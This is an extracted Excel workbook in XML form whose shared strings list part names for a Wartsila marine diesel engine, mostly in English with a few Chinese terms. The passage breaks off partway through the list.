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codeName="ThisWorkbook"/>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice Requires="x15">
      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="D:\CSEUserFiles\wangzhenqi\桌面\文件\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <bookViews>
    <workbookView xWindow="124035" yWindow="0" windowWidth="20340" windowHeight="11460" firstSheet="1" activeTab="1"/>
  </bookViews>
  <sheets>
    <sheet name="(m1)_(m2)_(m3)" sheetId="17" state="hidden" r:id="rId1"/>
    <sheet name="Dictionary" sheetId="15" r:id="rId2"/>
    <sheet name="MAN" sheetId="16" state="hidden" r:id="rId3"/>
    <sheet name="Dic backup" sheetId="11" state="hidden" r:id="rId4"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="3" hidden="1">'Dic backup'!$A$1:$D$1350</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">Dictionary!$A$2:$C$21443</definedName>
    <definedName name="Counter" localSheetId="0">'(m1)_(m2)_(m3)'!$C$82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Z2" i="15" l="1"/>
  <c r="Z3" i="15" l="1"/>
  <c r="Z5" i="15" l="1"/>
  <c r="Z8" i="15"/>
  <c r="Y4563" i="15"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="98713" uniqueCount="58745">
  <si>
    <t>DESCRIPTION</t>
  </si>
  <si>
    <t>LIST OF ID-NUMBERS</t>
  </si>
  <si>
    <t>POSITION OF IMO-ID NUMBERS</t>
  </si>
  <si>
    <t>ENGINE OUTLINE VIEW</t>
  </si>
  <si>
    <t>DISMANTL. DIMENSION PISTON/LINER</t>
  </si>
  <si>
    <t>DISMANTLING DIMENSIONS TIE ROD</t>
  </si>
  <si>
    <t>NAME PLATES ENGINE</t>
  </si>
  <si>
    <t>WARTSILA PLATE</t>
  </si>
  <si>
    <t>NAME PLATE</t>
  </si>
  <si>
    <t>PLATE</t>
  </si>
  <si>
    <t>WARNING PLATE</t>
  </si>
  <si>
    <t>DATA PLATE</t>
  </si>
  <si>
    <t>HEXAGON SOCKET HEAD CAP SCREW</t>
  </si>
  <si>
    <t>NAME PLATES TERMINAL BOX</t>
  </si>
  <si>
    <t>NAME PLATE SET</t>
  </si>
  <si>
    <t>NAME PLATES FLEX</t>
  </si>
  <si>
    <t>BEDPLATE OIL DRAIN</t>
  </si>
  <si>
    <t>FLANGE</t>
  </si>
  <si>
    <t>GASKET</t>
  </si>
  <si>
    <t>HEXAGON HEAD SCREW</t>
  </si>
  <si>
    <t>BEDPLATE MACHINING</t>
  </si>
  <si>
    <t>BEDPLATE</t>
  </si>
  <si>
    <t>WELD.SEQ.A.PLATES SUBJ.TO MAT.VER.</t>
  </si>
  <si>
    <t>CUTTING PLAN</t>
  </si>
  <si>
    <t>WELDING INSTRUCTIONS</t>
  </si>
  <si>
    <t>END BEARING GIRDER</t>
  </si>
  <si>
    <t>BEARING GIRDER CENTRE PIECE</t>
  </si>
  <si>
    <t>QUALITY AND TEST SPECIFICATION</t>
  </si>
  <si>
    <t>FLAT BAR</t>
  </si>
  <si>
    <t>NORMAL BEARING GIRDER</t>
  </si>
  <si>
    <t>STEP</t>
  </si>
  <si>
    <t>LIFTING LUG</t>
  </si>
  <si>
    <t>MAIN BEARING COVER</t>
  </si>
  <si>
    <t>ELASTIC BOLT</t>
  </si>
  <si>
    <t>ROUND NUT</t>
  </si>
  <si>
    <t>COVER</t>
  </si>
  <si>
    <t>SPRING DOWEL PIN</t>
  </si>
  <si>
    <t>SCREW PLUG</t>
  </si>
  <si>
    <t>MAIN BEARING ASSEMBLY PARTS</t>
  </si>
  <si>
    <t>SCREW</t>
  </si>
  <si>
    <t>MAIN BEARING SHELL</t>
  </si>
  <si>
    <t>INSTRUCTIONS</t>
  </si>
  <si>
    <t>THRUST BEARING</t>
  </si>
  <si>
    <t>ARBOR SUPPORT</t>
  </si>
  <si>
    <t>HEXAGON HEAD BOLT</t>
  </si>
  <si>
    <t>THRUST BEARING PADS</t>
  </si>
  <si>
    <t>THRUST BEARING PAD</t>
  </si>
  <si>
    <t>PAD</t>
  </si>
  <si>
    <t>SPECIFICATIONS/INSTRUCTIONS</t>
  </si>
  <si>
    <t>MATERIAL AND TEST SPECIFICATION</t>
  </si>
  <si>
    <t>TESTING SPECIFICATION</t>
  </si>
  <si>
    <t>ANNEALING INSTRUCTION</t>
  </si>
  <si>
    <t>HEAT TREATMENT SPECIFICATION</t>
  </si>
  <si>
    <t>ENGINE FRAME ASSEMBLY PARTS</t>
  </si>
  <si>
    <t>MONOBLOCK COLUMN MACHINING</t>
  </si>
  <si>
    <t>TOLERANCES OF FORM AND POSITION</t>
  </si>
  <si>
    <t>MONOBLOCK COLUMN</t>
  </si>
  <si>
    <t>BOTTOM PLATE</t>
  </si>
  <si>
    <t>CENTRE PLATE</t>
  </si>
  <si>
    <t>SIDE PLATE</t>
  </si>
  <si>
    <t>HAND GRIP</t>
  </si>
  <si>
    <t>CHANNEL</t>
  </si>
  <si>
    <t>ANGLE STEEL</t>
  </si>
  <si>
    <t>WELD-ON SOCKET</t>
  </si>
  <si>
    <t>INTERMEDIATE PLATE</t>
  </si>
  <si>
    <t>WELDING SEQUENCE</t>
  </si>
  <si>
    <t>DISTANCE PIECE</t>
  </si>
  <si>
    <t>CATCH</t>
  </si>
  <si>
    <t>PIN</t>
  </si>
  <si>
    <t>CHAIN</t>
  </si>
  <si>
    <t>SIDE SLOPING PLATE</t>
  </si>
  <si>
    <t>RING</t>
  </si>
  <si>
    <t>COVER PLATE</t>
  </si>
  <si>
    <t>BULB PLATE</t>
  </si>
  <si>
    <t>SUPPORT</t>
  </si>
  <si>
    <t>SYPHON</t>
  </si>
  <si>
    <t>BOLT</t>
  </si>
  <si>
    <t>RIB</t>
  </si>
  <si>
    <t>SQUARE PROFILE</t>
  </si>
  <si>
    <t>COLUMN DOORS</t>
  </si>
  <si>
    <t>LEVER</t>
  </si>
  <si>
    <t>HANDLE</t>
  </si>
  <si>
    <t>DISC</t>
  </si>
  <si>
    <t>CLAMP</t>
  </si>
  <si>
    <t>HEXAGON NUT</t>
  </si>
  <si>
    <t>RELIEF VALVE COLUMN</t>
  </si>
  <si>
    <t>RELIEF VALVE</t>
  </si>
  <si>
    <t>JOINT</t>
  </si>
  <si>
    <t>END CASING FE</t>
  </si>
  <si>
    <t>CASING UPPER PART</t>
  </si>
  <si>
    <t>CASING LOWER PART</t>
  </si>
  <si>
    <t>CONNECTION PIECE</t>
  </si>
  <si>
    <t>END CASING DE</t>
  </si>
  <si>
    <t>OIL BAFFLE</t>
  </si>
  <si>
    <t>OIL BAFFLE UPPER HALF</t>
  </si>
  <si>
    <t>OIL BAFFLE LOWER HALF</t>
  </si>
  <si>
    <t>BEARING HOUSING SUPPLY UNIT</t>
  </si>
  <si>
    <t>BEARING HOUSING</t>
  </si>
  <si>
    <t>BACK PLATE</t>
  </si>
  <si>
    <t>LOWER PLATE</t>
  </si>
  <si>
    <t>WELDING BOSS</t>
  </si>
  <si>
    <t>TIE ROD</t>
  </si>
  <si>
    <t>BUSH 2-PARTS</t>
  </si>
  <si>
    <t>INTERMEDIATE RING</t>
  </si>
  <si>
    <t>PROTECTION COVER</t>
  </si>
  <si>
    <t>TUBE SEAMLESS</t>
  </si>
  <si>
    <t>SET SCREW</t>
  </si>
  <si>
    <t>O-RING</t>
  </si>
  <si>
    <t>CYLINDER BLOCK ASSEMBLY PARTS</t>
  </si>
  <si>
    <t>CAP</t>
  </si>
  <si>
    <t>CYLINDER BLOCK</t>
  </si>
  <si>
    <t>MAT. AND QUALITY SPECIFICATION</t>
  </si>
  <si>
    <t>CYLINDER LINER</t>
  </si>
  <si>
    <t>MATERIAL AND QUALITY SPECIFICATION</t>
  </si>
  <si>
    <t>MARKING INSTRUCTIONS</t>
  </si>
  <si>
    <t>FIRST TIME PRODUCTION APPROVAL</t>
  </si>
  <si>
    <t>MACHINING INSTRUCTIONS</t>
  </si>
  <si>
    <t>ANTIPOLISHING RING</t>
  </si>
  <si>
    <t>CYLINDER LINER HOLDER</t>
  </si>
  <si>
    <t>HOLDER</t>
  </si>
  <si>
    <t>UPPER INSUL.BANDAGE CYL.LINER</t>
  </si>
  <si>
    <t>TEFLON STRIP</t>
  </si>
  <si>
    <t>EXTENSION SPRING</t>
  </si>
  <si>
    <t>WATER GUIDE JACKET</t>
  </si>
  <si>
    <t>SQUARE BAR</t>
  </si>
  <si>
    <t>TUBE</t>
  </si>
  <si>
    <t>ANGLE PLATE</t>
  </si>
  <si>
    <t>LUBRICATING QUILL FOR PULSE</t>
  </si>
  <si>
    <t>NOZZLE TIP</t>
  </si>
  <si>
    <t>NON RETURN VALVE</t>
  </si>
  <si>
    <t>GLAND BOX PISTON ROD</t>
  </si>
  <si>
    <t>HOUSING 2-PARTS</t>
  </si>
  <si>
    <t>SCRAPER RING 4-PARTS</t>
  </si>
  <si>
    <t>RING SUPPORT</t>
  </si>
  <si>
    <t>SCRAPER RING 3-PARTS</t>
  </si>
  <si>
    <t>LOCKING PLATE</t>
  </si>
  <si>
    <t>COMPRESSION CHAMBER</t>
  </si>
  <si>
    <t>CYLINDER COVER</t>
  </si>
  <si>
    <t>FTPA _MATERIAL SPECIFICATION</t>
  </si>
  <si>
    <t>PROTECTION LAYER</t>
  </si>
  <si>
    <t>TEMPLATE</t>
  </si>
  <si>
    <t>O-RING MATERIAL SPECIFICATION</t>
  </si>
  <si>
    <t>ROUND RUBBER RING</t>
  </si>
  <si>
    <t>INJECTION VALVE</t>
  </si>
  <si>
    <t>NOZZLE HOLDER</t>
  </si>
  <si>
    <t>INSERT BUSH</t>
  </si>
  <si>
    <t>MATERIAL SPECIFICATION</t>
  </si>
  <si>
    <t>COUPLING NUT</t>
  </si>
  <si>
    <t>INTERMEDIATE PIECE</t>
  </si>
  <si>
    <t>DOWEL PIN</t>
  </si>
  <si>
    <t>STOP BUSH</t>
  </si>
  <si>
    <t>TENSION WASHER CAGE</t>
  </si>
  <si>
    <t>BUSH</t>
  </si>
  <si>
    <t>BOTTOM</t>
  </si>
  <si>
    <t>CLAMPING NUT</t>
  </si>
  <si>
    <t>COMPRESSION SPRING</t>
  </si>
  <si>
    <t>CONTROL SPECIFICATION</t>
  </si>
  <si>
    <t>TAPPET</t>
  </si>
  <si>
    <t>SHIM RING</t>
  </si>
  <si>
    <t>SETTING INSTRUCTIONS</t>
  </si>
  <si>
    <t>ASSEMBLY INSTRUCTIONS</t>
  </si>
  <si>
    <t>NOZZLE SPECIFICATION</t>
  </si>
  <si>
    <t>NOZZLE BODY</t>
  </si>
  <si>
    <t>STARTING AIR VALVE</t>
  </si>
  <si>
    <t>HOUSING</t>
  </si>
  <si>
    <t>VALVE SPINDLE</t>
  </si>
  <si>
    <t>PISTON</t>
  </si>
  <si>
    <t>PISTON RING</t>
  </si>
  <si>
    <t>3/2-WAY SOLENOID VALVE</t>
  </si>
  <si>
    <t>EXHAUST VALVE</t>
  </si>
  <si>
    <t>UPPER HOUSING</t>
  </si>
  <si>
    <t>MATERIAL INSTRUCTIONS</t>
  </si>
  <si>
    <t>ORIFICE</t>
  </si>
  <si>
    <t>FILTER</t>
  </si>
  <si>
    <t>THROTTLE</t>
  </si>
  <si>
    <t>PISTON GUIDE</t>
  </si>
  <si>
    <t>OUTSIDE PISTON</t>
  </si>
  <si>
    <t>INSIDE PISTON</t>
  </si>
  <si>
    <t>DAMPER</t>
  </si>
  <si>
    <t>VALVE CAGE</t>
  </si>
  <si>
    <t>GUIDE BUSH</t>
  </si>
  <si>
    <t>THROTTLE SCREW</t>
  </si>
  <si>
    <t>VALVE SEAT</t>
  </si>
  <si>
    <t>DISTANCE RING</t>
  </si>
  <si>
    <t>LIFTING EYE BOLT</t>
  </si>
  <si>
    <t>GASKET SQUARE</t>
  </si>
  <si>
    <t>TRANSMITTER HOUSING</t>
  </si>
  <si>
    <t>VALVE STROKE SENSOR</t>
  </si>
  <si>
    <t>VALVE COTTER 2-PARTS</t>
  </si>
  <si>
    <t>CIRCLIP</t>
  </si>
  <si>
    <t>ROD JOINT RING</t>
  </si>
  <si>
    <t>PISTON JOINT RING</t>
  </si>
  <si>
    <t>EXHAUST VALVE SPINDLE</t>
  </si>
  <si>
    <t>ROTATION WING</t>
  </si>
  <si>
    <t>THRUST PIECE</t>
  </si>
  <si>
    <t>CRANKSHAFT ASSEMBLY PARTS</t>
  </si>
  <si>
    <t>COUPLING BOLT</t>
  </si>
  <si>
    <t>CASTLE NUT</t>
  </si>
  <si>
    <t>SPLIT PIN</t>
  </si>
  <si>
    <t>CRANKSHAFT MACHINING</t>
  </si>
  <si>
    <t>CRANK</t>
  </si>
  <si>
    <t>STAMPING OF CRANKSHAFT</t>
  </si>
  <si>
    <t>INSTRUCTIONS FOR TESTING DEVICE</t>
  </si>
  <si>
    <t>SHAFT JOURNAL</t>
  </si>
  <si>
    <t>SHAFT END</t>
  </si>
  <si>
    <t>FTPA: MATERIAL SPECIFICATION</t>
  </si>
  <si>
    <t>PRESERVING INSTRUCTIONS</t>
  </si>
  <si>
    <t>BORING DIAGRAM</t>
  </si>
  <si>
    <t>CONNECTION CRANK/PROPELLER SHAFT</t>
  </si>
  <si>
    <t>FLYWHEEL</t>
  </si>
  <si>
    <t>DISC/DAMPER DIMENSIONS</t>
  </si>
  <si>
    <t>VIBRATION DAMPER CRANKSHAFT</t>
  </si>
  <si>
    <t>INTERMEDIATE FLANGE</t>
  </si>
  <si>
    <t>OIL SUPPLY BUSH</t>
  </si>
  <si>
    <t>AXIAL EXPANSION PIECE</t>
  </si>
  <si>
    <t>ELBOW</t>
  </si>
  <si>
    <t>SQUARE FLANGE</t>
  </si>
  <si>
    <t>PIPING SPECIFICATIONS</t>
  </si>
  <si>
    <t>DRIVER SHAFT</t>
  </si>
  <si>
    <t>OIL DELIVERY PIPE</t>
  </si>
  <si>
    <t>PIPE</t>
  </si>
  <si>
    <t>BLIND FLANGE</t>
  </si>
  <si>
    <t>DAMPER MONITORING</t>
  </si>
  <si>
    <t>PRESSURE GAUGE BOARD</t>
  </si>
  <si>
    <t>CABLE SOCKET</t>
  </si>
  <si>
    <t>FLAT JOINT</t>
  </si>
  <si>
    <t>SCREW COUPLING</t>
  </si>
  <si>
    <t>CON.REDUCER</t>
  </si>
  <si>
    <t>COPPER PIPE</t>
  </si>
  <si>
    <t>PRESSURE TRANSMITTER</t>
  </si>
  <si>
    <t>PRESSURE GAUGE</t>
  </si>
  <si>
    <t>ALL-METALLIC HOSE</t>
  </si>
  <si>
    <t>PANEL UNION</t>
  </si>
  <si>
    <t>NUT CONNECTION</t>
  </si>
  <si>
    <t>SCREW-IN UNION</t>
  </si>
  <si>
    <t>CLAMPING RING</t>
  </si>
  <si>
    <t>RUBBER RING</t>
  </si>
  <si>
    <t>AXIAL DETUNER</t>
  </si>
  <si>
    <t>CYLINDER 2-PARTS</t>
  </si>
  <si>
    <t>CYLINDER HALF</t>
  </si>
  <si>
    <t>PRESSURE REDUCING NOZZLE</t>
  </si>
  <si>
    <t>OIL PIPING</t>
  </si>
  <si>
    <t>STUD COUPLING</t>
  </si>
  <si>
    <t>STRAIGHT UNION</t>
  </si>
  <si>
    <t>STIRRUP BOLT</t>
  </si>
  <si>
    <t>TURNING GEAR</t>
  </si>
  <si>
    <t>PINION</t>
  </si>
  <si>
    <t>PROTECTION SLEEVE</t>
  </si>
  <si>
    <t>DISENGAGING DEVICE TURNING GEAR</t>
  </si>
  <si>
    <t>FORK LEVER</t>
  </si>
  <si>
    <t>ROUND BAR</t>
  </si>
  <si>
    <t>DISENGAGING FORK</t>
  </si>
  <si>
    <t>BEARING SUPPORT</t>
  </si>
  <si>
    <t>BEARING PLATE</t>
  </si>
  <si>
    <t>PLATE FOR LEVER</t>
  </si>
  <si>
    <t>ANCHOR PLATE</t>
  </si>
  <si>
    <t>SHAFT</t>
  </si>
  <si>
    <t>TURNING KNOB</t>
  </si>
  <si>
    <t>3/2-WAY VALVE</t>
  </si>
  <si>
    <t>LIMIT SWITCH</t>
  </si>
  <si>
    <t>END PIECE</t>
  </si>
  <si>
    <t>TENSION WASHER</t>
  </si>
  <si>
    <t>CABLE FITTING</t>
  </si>
  <si>
    <t>POSITION INDICATOR RUNNING GEAR</t>
  </si>
  <si>
    <t>OPERATING STATION TURNING GEAR</t>
  </si>
  <si>
    <t>MATERIAL LIST</t>
  </si>
  <si>
    <t>OPERATING STATION</t>
  </si>
  <si>
    <t>WIRING DIAGRAM</t>
  </si>
  <si>
    <t>BOX RECEPTACLE</t>
  </si>
  <si>
    <t>CONNECTING ROD ASSEMBLY PARTS</t>
  </si>
  <si>
    <t>CONNECTING ROD</t>
  </si>
  <si>
    <t>CONNECTING ROD SHAFT</t>
  </si>
  <si>
    <t>BEARING COVER CRANK PIN</t>
  </si>
  <si>
    <t>BEARING COVER CROSSHEAD</t>
  </si>
  <si>
    <t>UPPER BEARING HALF</t>
  </si>
  <si>
    <t>BEARING SHELL CROSSHEAD</t>
  </si>
  <si>
    <t>CROSSHEAD/GUIDE SHOE</t>
  </si>
  <si>
    <t>CROSSHEAD PIN</t>
  </si>
  <si>
    <t>INSTR. FOR SURFACE EXAMINATION</t>
  </si>
  <si>
    <t>PRESERVING INSTRUCTION</t>
  </si>
  <si>
    <t>GUIDE SHOE</t>
  </si>
  <si>
    <t>HOLDING PLATE</t>
  </si>
  <si>
    <t>GUIDE RAIL</t>
  </si>
  <si>
    <t>SHIM</t>
  </si>
  <si>
    <t>COMPRESSION SHIM</t>
  </si>
  <si>
    <t>PISTON ASSEMBLY PARTS</t>
  </si>
  <si>
    <t>SPRAYING PLATE WITH OIL TUBE</t>
  </si>
  <si>
    <t>SPRAYING NOZZLE</t>
  </si>
  <si>
    <t>REDUCER</t>
  </si>
  <si>
    <t>SPRAYING PLATE</t>
  </si>
  <si>
    <t>ELASTIC SCREW</t>
  </si>
  <si>
    <t>PISTON HEAD</t>
  </si>
  <si>
    <t>PISTON SKIRT</t>
  </si>
  <si>
    <t>PISTON ROD</t>
  </si>
  <si>
    <t>CHECKING INSTRUCTIONS</t>
  </si>
  <si>
    <t>INSIDE PIPE</t>
  </si>
  <si>
    <t>连接块</t>
  </si>
  <si>
    <t>RING HOLDER</t>
  </si>
  <si>
    <t>六角头螺栓</t>
  </si>
  <si>
    <t>螺塞</t>
  </si>
  <si>
    <t>锁紧板</t>
  </si>
  <si>
    <t>ENGINE CONTROL DIAGRAM</t>
  </si>
  <si>
    <t>ELECTRIC POWER DIAGRAM</t>
  </si>
  <si>
    <t>SOFTWARE WECS</t>
  </si>
  <si>
    <t>DRIVE SUPPLY UNIT</t>
  </si>
  <si>
    <t>GEAR WHEEL CRANKSHAFT</t>
  </si>
  <si>
    <t>GEAR WHEEL</t>
  </si>
  <si>
    <t>INSTRUCTION FOR STRESS RELIEVING</t>
  </si>
  <si>
    <t>BASIC PROFILE OF TOOL</t>
  </si>
  <si>
    <t>GEAR WHEELS MEASURING SPEC.</t>
  </si>
  <si>
    <t>INTERMEDIATE WHEEL SUPPLY UNIT</t>
  </si>
  <si>
    <t>INTERMEDIATE WHEEL</t>
  </si>
  <si>
    <t>MATERIAL/ TESTING INSTRUCTIONS</t>
  </si>
  <si>
    <t>BEARING PIN</t>
  </si>
  <si>
    <t>BEARING PAIR</t>
  </si>
  <si>
    <t>BEARING</t>
  </si>
  <si>
    <t>CHECKING GAUGE</t>
  </si>
  <si>
    <t>SHUT-OFF VALVE STARTING AIR</t>
  </si>
  <si>
    <t>VALVE BODY</t>
  </si>
  <si>
    <t>VALVE</t>
  </si>
  <si>
    <t>VALVE GUIDE</t>
  </si>
  <si>
    <t>STOPPER</t>
  </si>
  <si>
    <t>SPINDLE</t>
  </si>
  <si>
    <t>SPINDLE NUT</t>
  </si>
  <si>
    <t>HAND WHEEL</t>
  </si>
  <si>
    <t>CONTROL VALVE</t>
  </si>
  <si>
    <t>VALVE BLOCK</t>
  </si>
  <si>
    <t>DOUBLE NON RETURN VALVE</t>
  </si>
  <si>
    <t>PRESSURE SWITCH</t>
  </si>
  <si>
    <t>SILENCER</t>
  </si>
  <si>
    <t>SET SCREW WITH DOG POINT</t>
  </si>
  <si>
    <t>SCRAPER RING</t>
  </si>
  <si>
    <t>CONTROL AIR SUPPLY</t>
  </si>
  <si>
    <t>PRESSURE REDUCING VALVE</t>
  </si>
  <si>
    <t>PROTECTION PLATE</t>
  </si>
  <si>
    <t>BOURDON TUBE PRESSURE GAUGE</t>
  </si>
  <si>
    <t>3/2-WAY SHUT-OFF VALVE</t>
  </si>
  <si>
    <t>REDUCTION NIPPLE</t>
  </si>
  <si>
    <t>MALE STUD ELBOW COUPLING</t>
  </si>
  <si>
    <t>ADJUSTABLE NIPPLE</t>
  </si>
  <si>
    <t>THRUST RING</t>
  </si>
  <si>
    <t>CONNECTING PIECE</t>
  </si>
  <si>
    <t>TEE UNION</t>
  </si>
  <si>
    <t>MALE ADAPTER</t>
  </si>
  <si>
    <t>CONTROL AIR SUPPLY ARRANGEMENT</t>
  </si>
  <si>
    <t>FRAME</t>
  </si>
  <si>
    <t>CHANNEL STEEL</t>
  </si>
  <si>
    <t>AIR TANK</t>
  </si>
  <si>
    <t>AIR BOTTLE</t>
  </si>
  <si>
    <t>DRAIN VALVE</t>
  </si>
  <si>
    <t>CONTROL BOX LOCAL MANOEUV. STAND</t>
  </si>
  <si>
    <t>INSTRUCTION PANEL</t>
  </si>
  <si>
    <t>PICK-UP ENGINE SPEED/TDC</t>
  </si>
  <si>
    <t>PICK-UP HOLDER</t>
  </si>
  <si>
    <t>CHANNEL BAR</t>
  </si>
  <si>
    <t>PROXIMITY SENSOR</t>
  </si>
  <si>
    <t>PLUG WITH CABLE</t>
  </si>
  <si>
    <t>CRANK ANGLE MARK</t>
  </si>
  <si>
    <t>TERMINAL BOX</t>
  </si>
  <si>
    <t>MOUNTING RAIL</t>
  </si>
  <si>
    <t>4 CONDUCTOR TERMINAL BLOCK</t>
  </si>
  <si>
    <t>END STOP</t>
  </si>
  <si>
    <t>VERTICAL MARKER</t>
  </si>
  <si>
    <t>CLOSING PIN</t>
  </si>
  <si>
    <t>SPEED CONTROL SYSTEM</t>
  </si>
  <si>
    <t>GEAR WHEEL SUPPLY UNIT</t>
  </si>
  <si>
    <t>WHEEL</t>
  </si>
  <si>
    <t>PUMP SERVO OIL</t>
  </si>
  <si>
    <t>SUPPLY UNIT</t>
  </si>
  <si>
    <t>CAMSHAFT</t>
  </si>
  <si>
    <t>UPPER BEARING SHELL HALF</t>
  </si>
  <si>
    <t>BEARING- RUNNING LAYER</t>
  </si>
  <si>
    <t>ORDER AND CONTROL INSTRUCTION</t>
  </si>
  <si>
    <t>LOWER BEARING SHELL HALF</t>
  </si>
  <si>
    <t>THRUST BEARING RING HALF</t>
  </si>
  <si>
    <t>NOZZLE</t>
  </si>
  <si>
    <t>PREC. TUBE SEAMLESS</t>
  </si>
  <si>
    <t>STUD</t>
  </si>
  <si>
    <t>BOSS</t>
  </si>
  <si>
    <t>RUBBER PLATE</t>
  </si>
  <si>
    <t>SNAP RING</t>
  </si>
  <si>
    <t>SUPPLY UNIT ASSEMBLY PARTS</t>
  </si>
  <si>
    <t>SLEEVE</t>
  </si>
  <si>
    <t>CASING SUPPLY UNIT</t>
  </si>
  <si>
    <t>BEARING COVER</t>
  </si>
  <si>
    <t>BEARING BUSH</t>
  </si>
  <si>
    <t>FITTING INSTRUCTIONS</t>
  </si>
  <si>
    <t>FILLING PIECE</t>
  </si>
  <si>
    <t>FUEL PUMP</t>
  </si>
  <si>
    <t>LOWER HOUSING</t>
  </si>
  <si>
    <t>INTERMEDIATE DISC</t>
  </si>
  <si>
    <t>GUIDE PIN</t>
  </si>
  <si>
    <t>NITROCARBURIZING SPECIFICATION</t>
  </si>
  <si>
    <t>REGULATING SLEEVE</t>
  </si>
  <si>
    <t>TOOTHED RACK</t>
  </si>
  <si>
    <t>PUMP COVER</t>
  </si>
  <si>
    <t>UPPER SPRING CARRIER</t>
  </si>
  <si>
    <t>GUIDE PISTON</t>
  </si>
  <si>
    <t>SPECIFICATION</t>
  </si>
  <si>
    <t>MAT. AND MACHINING INSTRUCTIONS</t>
  </si>
  <si>
    <t>ROLLER PIN</t>
  </si>
  <si>
    <t>ROLLER</t>
  </si>
  <si>
    <t>PRESSURE DISC</t>
  </si>
  <si>
    <t>RETAINING SCREW</t>
  </si>
  <si>
    <t>FLUTED SEAL RING</t>
  </si>
  <si>
    <t>LOWER SPRING CARRIER</t>
  </si>
  <si>
    <t>TEST INSTRUCTIONS</t>
  </si>
  <si>
    <t>CONTROL EDGES</t>
  </si>
  <si>
    <t>FUEL PUMP PLUNGER</t>
  </si>
  <si>
    <t>PUMP CYLINDER</t>
  </si>
  <si>
    <t>PUMP PLUNGER</t>
  </si>
  <si>
    <t>RAIL UNIT</t>
  </si>
  <si>
    <t>TROUGH</t>
  </si>
  <si>
    <t>CABLE CHANNEL</t>
  </si>
  <si>
    <t>STUB</t>
  </si>
  <si>
    <t>ANGLE</t>
  </si>
  <si>
    <t>GRATING</t>
  </si>
  <si>
    <t>SIDE COVER</t>
  </si>
  <si>
    <t>COVERING</t>
  </si>
  <si>
    <t>UPPER COVER</t>
  </si>
  <si>
    <t>DISTANCE BOLT</t>
  </si>
  <si>
    <t>PIPE CLAMP</t>
  </si>
  <si>
    <t>SLOTTED COUNTERSUNK HEAD SCREW</t>
  </si>
  <si>
    <t>FRONT PLATE</t>
  </si>
  <si>
    <t>ROD</t>
  </si>
  <si>
    <t>HINGE</t>
  </si>
  <si>
    <t>PROTECTION</t>
  </si>
  <si>
    <t>RAIL UNIT ARRANGEMENT DRAWING</t>
  </si>
  <si>
    <t>FUEL RAIL</t>
  </si>
  <si>
    <t>SUPPLEMENTARY MATERIAL INSTR.</t>
  </si>
  <si>
    <t>LIP SEAL</t>
  </si>
  <si>
    <t>DRAIN SCREW</t>
  </si>
  <si>
    <t>FUEL PIPING</t>
  </si>
  <si>
    <t>HEATING PIPE</t>
  </si>
  <si>
    <t>RECTANGULAR HOLLOW PROFILE</t>
  </si>
  <si>
    <t>FUEL RUNBACK PIPE</t>
  </si>
  <si>
    <t>RETAINING CLIP 2-PARTS</t>
  </si>
  <si>
    <t>RETAINING CLIP</t>
  </si>
  <si>
    <t>CLAMPING SCREW</t>
  </si>
  <si>
    <t>ASSEMBLY TOOL</t>
  </si>
  <si>
    <t>ADJUSTABLE ANGLE UNION</t>
  </si>
  <si>
    <t>STRAIGHT PANEL UNION-PIECE</t>
  </si>
  <si>
    <t>ANGLE UNION</t>
  </si>
  <si>
    <t>RETURN PIPING</t>
  </si>
  <si>
    <t>CONNECTION SLEEVE</t>
  </si>
  <si>
    <t>PRESSURE CONTROL VALVE</t>
  </si>
  <si>
    <t>RELIEF VALVE HOUSING</t>
  </si>
  <si>
    <t>VALVE NEEDLE</t>
  </si>
  <si>
    <t>SPRING CARRIER</t>
  </si>
  <si>
    <t>STOP RING</t>
  </si>
  <si>
    <t>DISC SPRING</t>
  </si>
  <si>
    <t>SEATING WASHER</t>
  </si>
  <si>
    <t>BACK-UP RING</t>
  </si>
  <si>
    <t>MOUNTING/ADJUSTING INSTRUCTIONS</t>
  </si>
  <si>
    <t>KNURLED SCREW</t>
  </si>
  <si>
    <t>SPRING HOUSING</t>
  </si>
  <si>
    <t>AXIAL SLIDE VALVE</t>
  </si>
  <si>
    <t>MEASURING CYLINDER</t>
  </si>
  <si>
    <t>CYLINDER</t>
  </si>
  <si>
    <t>VALVE TIP</t>
  </si>
  <si>
    <t>OIL FILTER</t>
  </si>
  <si>
    <t>STAY</t>
  </si>
  <si>
    <t>HOSE SECTION</t>
  </si>
  <si>
    <t>ADJUSTING DISC</t>
  </si>
  <si>
    <t>VALVE HOUSING</t>
  </si>
  <si>
    <t>INSULATION BANDAGE</t>
  </si>
  <si>
    <t>INJECTION CONTROL UNIT</t>
  </si>
  <si>
    <t>SERVO OIL BRANCH PIPE PULSE</t>
  </si>
  <si>
    <t>SERVO OIL PIPE</t>
  </si>
  <si>
    <t>BALL VALVE</t>
  </si>
  <si>
    <t>CONNECTING BLOCK</t>
  </si>
  <si>
    <t>CONNECTION NIPPLE</t>
  </si>
  <si>
    <t>SERVO OIL RAIL</t>
  </si>
  <si>
    <t>CLEANING INSTRUCTIONS</t>
  </si>
  <si>
    <t>BLANK FLANGE</t>
  </si>
  <si>
    <t>T-BAR</t>
  </si>
  <si>
    <t>PRESSURE REGULATING UNIT</t>
  </si>
  <si>
    <t>ACCUMULATOR</t>
  </si>
  <si>
    <t>PRESSURE GAUGE CONNECTION</t>
  </si>
  <si>
    <t>PLUG</t>
  </si>
  <si>
    <t>FLEXIBLE HOSE</t>
  </si>
  <si>
    <t>FLANGE BUNDLE</t>
  </si>
  <si>
    <t>ORIFICE SERVO OIL</t>
  </si>
  <si>
    <t>SUPPLY PIPE</t>
  </si>
  <si>
    <t>CONNECTION BRANCH</t>
  </si>
  <si>
    <t>EXHAUST VALVE CONTROL UNIT</t>
  </si>
  <si>
    <t>VALVE CONTROL BLOCK</t>
  </si>
  <si>
    <t>SLIDE ROD</t>
  </si>
  <si>
    <t>SEALING FLANGE</t>
  </si>
  <si>
    <t>FILTER HOLDER</t>
  </si>
  <si>
    <t>RAIL VALVE</t>
  </si>
  <si>
    <t>REGULATING LINKAGE ARRANGEMENT</t>
  </si>
  <si>
    <t>FUEL PUMP ACTUATOR</t>
  </si>
  <si>
